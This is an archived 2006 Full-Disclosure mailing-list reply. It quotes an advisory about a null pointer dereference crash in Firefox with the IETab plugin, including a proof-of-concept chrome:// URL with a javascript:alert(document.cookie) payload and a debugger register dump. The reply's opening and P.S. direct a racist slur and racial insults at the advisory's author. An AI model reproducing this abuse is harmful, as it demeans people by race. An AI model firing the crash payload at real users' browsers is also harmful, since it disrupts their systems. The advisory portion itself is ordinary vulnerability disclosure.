[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Firefox (with IETab Plugin) Null Pointer Dereferences Bug
- To: "Debasis Mohanty" <debasis.mohanty.listmails@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Firefox (with IETab Plugin) Null Pointer Dereferences Bug
- From: "PERFECT.MATERIAL" <perfect.material@xxxxxxxxx>
- Date: Thu, 18 May 2006 01:25:21 -0400
Dear Tan Colored Niggerish Guy,
This is not the right list for Mozilla extension bug reports. This list is
for security stuff only guy :)
PERFECT.MATERIAL
P.S. Your race smells bad you worthless idiot!
On 5/17/06, Debasis Mohanty <debasis.mohanty.listmails@xxxxxxxxx> wrote:
Firefox (with IETab Plugin) Null Pointer Dereferences Bug
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vendor: Mozilla
Product: FireFox with IE Tab
Bugzilla ID: 14151 (http://bugzilla.mozdev.org/show_bug.cgi?id=14151)
(Initially I incorrectly logged the bug under the wrong product,
thanks to Dan Veditz to log it under appropriate product on behalf of
me).
Tested On:
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
Introduction:
IETab (https://addons.mozilla.org/firefox/1419/) is a recently
released (April 12, 2006) plugin for Firefox. It is used to browse IE
(only) specific sites under Firefox. Guess what ?? You can run
windowsupdate under FireFox
;-)
Bug Details:
Firefox with the IETab installed crashes when ietab plugin is unable
to handle specific javascripts. It seems to be a null pointer
dereference bug.
For more details refer the PoC section.
Proof-of-Concept:
Copy & paste the following URL to the Firefox addressbar and press enter -
chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie
);
Note: This test will not work if IETab is not installed.
The Registers details after the crash:
(1e4.3e0): Access violation - code c0000005 (first chance) First
chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10 mov dx,[eax]
ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10 mov dx,[eax]
ds:0023:00000000=????
For more vulnerabilities :
http://hackingspirits.com/vuln-rnd/vuln-rnd.html
Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/